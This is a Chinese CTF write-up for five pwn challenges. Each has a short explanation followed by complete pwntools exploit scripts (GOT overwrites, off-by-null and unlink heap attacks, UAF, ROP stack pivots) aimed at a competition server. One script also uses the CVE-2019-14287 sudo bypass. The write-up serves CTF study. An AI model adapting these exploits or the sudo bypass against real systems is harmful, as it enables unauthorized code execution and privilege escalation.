pwn题目质量这次感觉偏低了,感觉还没有去年某些时候的题目质量高,可能此次题目难度集中在新增的两个类型题目上面了吧,出题师傅看见轻打 [附件]
emarm
泄漏下lib地址,然后计算下基址,因为远程qemu无随机化,所以直接任意写改got表即可
1 | from pwn import* |
2 | p = process("qemu-aarch64 -L . ./emarm",shell=True) |
3 | p = remote('183.129.189.60',10012) |
4 | elf =ELF('./emarm') |
5 | libc =ELF('./libc.so.6') |
6 | p.sendlineafter('passwd:','\x00') |
7 | p.send(str(elf.got['atoi'])) |
8 | system = libc.sym['system'] + 0x4000830000 |
9 | p.sendafter('success',p64(system)) |
10 | p.interactive() |
ememarm
同样是ARM架构的ELF文件,QEMU启动然后发现有个off by null,通过创造一个fake chunk,实现任意写改free_hook为system后利用程序结束时的free执行/bin/sh
1 | from pwn import* |
2 | def menu(ch): |
3 | p.sendlineafter('choice:',str(ch)) |
4 | def add(content1,content2,sign): |
5 | menu(1) |
6 | p.sendafter('cx:',content1) |
7 | p.sendafter('cy:',content2) |
8 | p.sendlineafter('delete?',str(sign)) |
9 | def free(index,content): |
10 | menu(3) |
11 | p.sendline(str(index)) |
12 | p.send(content) |
13 | def gift(content1,content2,sign): |
14 | menu(4) |
15 | p.sendafter('cx:',content1) |
16 | p.sendafter('cy:',content2) |
17 | p.sendlineafter('delete?',str(sign)) |
18 | |
19 | p = process("qemu-aarch64 -g 5555 -L . ./main",shell=True) |
20 | p = remote('183.129.189.60',10034) |
21 | elf =ELF('./main') |
22 | libc =ELF('./libc.so.6') |
23 | p.send('/bin/sh\x00') |
24 | |
25 | add('FMYY','FMYY',0) |
26 | add('FMYY','FMYY',0) |
27 | add('FMYY','FMYY',1) |
28 | |
29 | gift('FMYY',p64(0x31),1) |
30 | free(1,p64(0) + p64(0x41) + 'FMYYSSSS') |
31 | |
32 | gift('FMYY',p64(0x4000830000 + libc.sym['__free_hook']),0) |
33 | #og = [0x3F14c,0x3F150,0x3F174,0x3F198,0x63E80,0x63E78,0x63E6C] |
34 | free(2,p64(libc.sym['system'] + 0x4000830000)) |
35 | menu(5) |
36 | p.interactive() |
justcode
简单在栈上布置ROP,然后修改got表,将栈迁移上去即可
1 | from pwn import* |
2 | context.log_level = 'DEBUG' |
3 | p = process('./main') |
4 | p = remote('183.129.189.60',10041) |
5 | libc =ELF('./libc-2.23.so') |
6 | p.sendline('1') |
7 | p.sendline('1') |
8 | p.sendline('1') |
9 | p.sendline('2') |
10 | p.sendafter('name:','F'*8) |
11 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x7B61E |
12 | log.info('LIBC:\t' + hex(libc_base)) |
13 | p.sendafter('name:','F'*8*5) |
14 | stack = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0xD0 |
15 | log.info('Stack:\t' + hex(stack)) |
16 | |
17 | Open = libc_base + libc.symbols["open"] |
18 | Read = libc_base + libc.symbols["read"] |
19 | Puts = libc_base + libc.symbols['puts'] |
20 | pop_rdi_ret = libc_base + 0x0000000000021112 |
21 | pop_rsi_ret = libc_base + 0x00000000000202F8 |
22 | pop_rdx_ret = libc_base + 0x0000000000001B92 |
23 | pop_rdx_xx = libc_base + 0x00000000000EA759 |
24 | orw = '' |
25 | orw += p64(pop_rdi_ret)+p64(stack + 0x78) |
26 | orw += p64(pop_rsi_ret)+p64(0) |
27 | orw += p64(Open) |
28 | orw += p64(pop_rdi_ret) + p64(3) |
29 | orw += p64(pop_rsi_ret) + p64(libc.bss() + libc_base + 0x200) |
30 | orw += p64(Read) |
31 | orw += p64(pop_rdi_ret)+p64(libc.bss() + libc_base + 0x200) |
32 | orw += p64(Puts) |
33 | orw += './flag\x00\x00' |
34 | |
35 | payload = p64(0x30) + '\x00'*0x4 + p32(0x602028) + orw |
36 | p.sendlineafter('name:',payload) |
37 | p.sendlineafter('id',str((pop_rdx_xx&0xFFFFFFFF))) |
38 | p.interactive() |
undlv 【FB】
2.23的one_gadget有两个和read函数可以爆破到同一个内存页,所以构造unlink任意写修改read的got表,然后CVE-2019-14287获取flag,这个题太水了
1 | from pwn import* |
2 | def menu(ch): |
3 | p.sendline(str(ch)) |
4 | sleep(0.1) |
5 | def add(idx): |
6 | menu(1) |
7 | p.sendline(str(idx)) |
8 | sleep(0.1) |
9 | def edit(idx,content): |
10 | menu(2) |
11 | p.sendline(str(idx)) |
12 | sleep(0.1) |
13 | p.send(content) |
14 | sleep(0.1) |
15 | def free(idx): |
16 | menu(3) |
17 | p.sendline(str(idx)) |
18 | sleep(0.1) |
19 | p = process('./main') |
20 | elf =ELF('./main') |
21 | p = remote('183.129.189.60',10013) |
22 | libc = ELF('./libc-2.23.so') |
23 | |
24 | LIST = 0x403480 |
25 | payload = p64(0) + p64(0xF1) |
26 | payload += p64(LIST - 0x18) + p64(LIST - 0x10) |
27 | payload = payload.ljust(0xF0,'\x00') |
28 | payload += p64(0xF0) |
29 | add(0) |
30 | add(1) |
31 | menu(4) |
32 | edit(0,payload) |
33 | free(1) |
34 | edit(0,'\x00'*0x18 + p64(elf.got['read'])) |
35 | edit(0,'\x07\x42') |
36 | pause() |
37 | p.sendline('sudo -u#-1 cat flag') |
38 | p.interactive() |
vtcpp [FB]
UAF,有一说一,给我吧把libc文件中setcontext的寄存器改了,让我卡了两个小时,我一度以为一直是rdi在控制参数,结果变成rcx控制了,那就换一个通用gadget来栈迁移即可
1 | from pwn import* |
2 | #context.log_level = 'DEBUG' |
3 | def menu(ch): |
4 | p.sendlineafter('> ',str(ch)) |
5 | def new(name,age,msg): |
6 | menu(1) |
7 | p.sendlineafter('name: ',name) |
8 | p.sendlineafter('age: ',str(age)) |
9 | p.sendlineafter('message: ',msg) |
10 | def note(size,note): |
11 | menu(4) |
12 | p.sendlineafter('size: ',str(size)) |
13 | p.sendafter('content: ',note) |
14 | p = process('./main') |
15 | p = process(['./main'],env={'LD_PRELOAD':'./libc-2.23.so'}) |
16 | p = remote('183.129.189.60',10000) |
17 | context.binary = './main' |
18 | elf = ELF('./main') |
19 | libc = ELF('./libc-2.23.so') |
20 | new('FMYY',16,'FMYY') |
21 | menu(2) |
22 | note(0x38,p64(0x401D98) + p64(0) + p64(0x603328) + p64(8)) |
23 | menu(3) |
24 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdout_'] |
25 | |
26 | new('FMYY',16,'FMYY') |
27 | new('FMYY',16,'FMYY') |
28 | menu(2) |
29 | note(0x38,p64(0x401D98) + p64(0) + p64(0x603340) + p64(8)) |
30 | menu(3) |
31 | |
32 | p.recvuntil('name :') |
33 | heap = u64(p.recv(8)) |
34 | log.info('HEAP:\t' + hex(heap)) |
35 | |
36 | menu(2) |
37 | note(0x38,p64(0x401D98) + p64(0) + p64(libc_base + libc.sym['__malloc_hook'] + 0x68) + p64(8)) |
38 | menu(3) |
39 | p.recvuntil('name :') |
40 | top = u64(p.recv(8)) |
41 | log.info('TOP:\t' + hex(top)) |
42 | |
43 | for i in range(2): |
44 | note(0x38,'FMYY') |
45 | for i in range(4): |
46 | note(0x10,'FMYY') |
47 | |
48 | |
49 | new('FMYY',16,'FMYY') |
50 | menu(2) |
51 | note(0x38,p64(0x401D98) + p64(0) + p64(0x603340) + p64(8)) |
52 | menu(3) |
53 | p.recvuntil('name :') |
54 | heap2 = u64(p.recv(8)) |
55 | log.info('HEAP2:\t' + hex(heap2)) |
56 | menu(3) |
57 | |
58 | magic = 0x603360 |
59 | Open = libc_base + libc.symbols["openat"] |
60 | Read = libc_base + libc.symbols["read"] |
61 | Write = libc_base + libc.symbols['write'] |
62 | Puts = libc_base + libc.sym['puts'] |
63 | pop_rdi_ret = libc_base + 0x0000000000021112 |
64 | pop_rsi_ret = libc_base + 0x00000000000202F8 |
65 | pop_rdx_ret = libc_base + 0x0000000000001B92 |
66 | leave_ret = libc_base + 0x0000000000042361 |
67 | ret = pop_rdi_ret + 1 |
68 | orw = '' |
69 | orw += p64(pop_rdi_ret) + p64(0) |
70 | orw += p64(pop_rsi_ret) + p64(leave_ret) |
71 | orw += p64(pop_rsi_ret) + p64(magic + 0xA0) |
72 | orw += p64(pop_rdx_ret) + p64(0) |
73 | orw += p64(Open) |
74 | orw += p64(pop_rdi_ret) + p64(3) |
75 | orw += p64(pop_rsi_ret) + p64(0x603400) |
76 | orw += p64(pop_rdx_ret) + p64(0x30) |
77 | orw += p64(Read) |
78 | orw += p64(pop_rdi_ret)+p64(1) |
79 | orw += p64(Write) |
80 | orw += '/flag\x00\x00' |
81 | |
82 | gadget1 = 0x000000000007371E + libc_base |
83 | new('FMYY',16,p64(gadget1) + orw) |
84 | menu(2) |
85 | note(0x38,p64(magic)) |
86 | note(0x100,'\x00'*0x58 + p64(magic)) |
87 | #gdb.attach(p,"b *0x401826") |
88 | menu(3) |
89 | |
90 | log.info('LIBC:\t' + hex(libc_base)) |
91 | p.interactive() |